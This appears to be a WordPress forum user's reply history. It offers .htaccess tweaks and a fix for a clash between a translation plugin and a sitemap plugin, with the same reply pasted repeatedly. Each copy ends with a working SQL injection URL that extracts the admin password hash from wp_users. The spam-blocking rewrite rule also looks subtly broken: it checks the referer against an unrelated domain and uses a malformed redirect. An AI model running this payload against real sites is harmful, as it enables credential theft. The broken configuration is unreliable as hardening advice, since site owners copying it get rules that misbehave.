pino262
Forum Replies Created
-
or put this in your htacces
php_value memory_limit 256M
php_value max_execution_time 720
php_value max_input_time 60heres a part of my htacces file…. might help some people
<files .htaccess>
order allow,deny
deny from all
</files>
<files wp-config.php>
order allow,deny
deny from all
</files>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
php_value memory_limit 256M
php_value max_execution_time 720
ServerSignature Off
# limit file uploads to 10mb
LimitRequestBody 10240000
# limit file uploads to 10mb
# disable directory browsing
Options All -Indexes
# disable directory browsing
# protect from spam comments
RewriteEngine On
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
RewriteCond %{HTTP_REFERER} !.*piratebayz.org.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule (.*) ^https://%{REMOTE_ADDR}/$ [R=301,L]
# protect from spam commentsForum: Plugins
In reply to: [Plugin: Google XML Sitemaps] Memory/Time Limit IssueMy problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:
If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.GO TO
YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php
Now scroll a bit down and uncheck this: Enable sitemap integration
Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is
/wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58), 666,CHAR(58))+FROM+wp_users+where+id=1/*
I SOLVEd THE PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:
If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.GO TO
YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php
Now scroll a bit down and uncheck this: Enable sitemap integration
Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is
/wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58), 666,CHAR(58))+FROM+wp_users+where+id=1/*
Forum: Plugins
In reply to: Building sitemap doesn’t workI SOLVEd THE PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:
If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.GO TO
YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php
Now scroll a bit down and uncheck this: Enable sitemap integration
Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is
/wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58), 666,CHAR(58))+FROM+wp_users+where+id=1/*
I SOLVED MY PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:
If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.GO TO
YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php
Now scroll a bit down and uncheck this: Enable sitemap integration
Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is
/wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58), 666,CHAR(58))+FROM+wp_users+where+id=1/*
I SOLVEd THE PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:
If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.GO TO
YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php
Now scroll a bit down and uncheck this: Enable sitemap integration
Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is
/wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58), 666,CHAR(58))+FROM+wp_users+where+id=1/*
I SOLVEd THE PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:
If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.GO TO
YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php
Now scroll a bit down and uncheck this: Enable sitemap integration
Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is
/wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58), 666,CHAR(58))+FROM+wp_users+where+id=1/*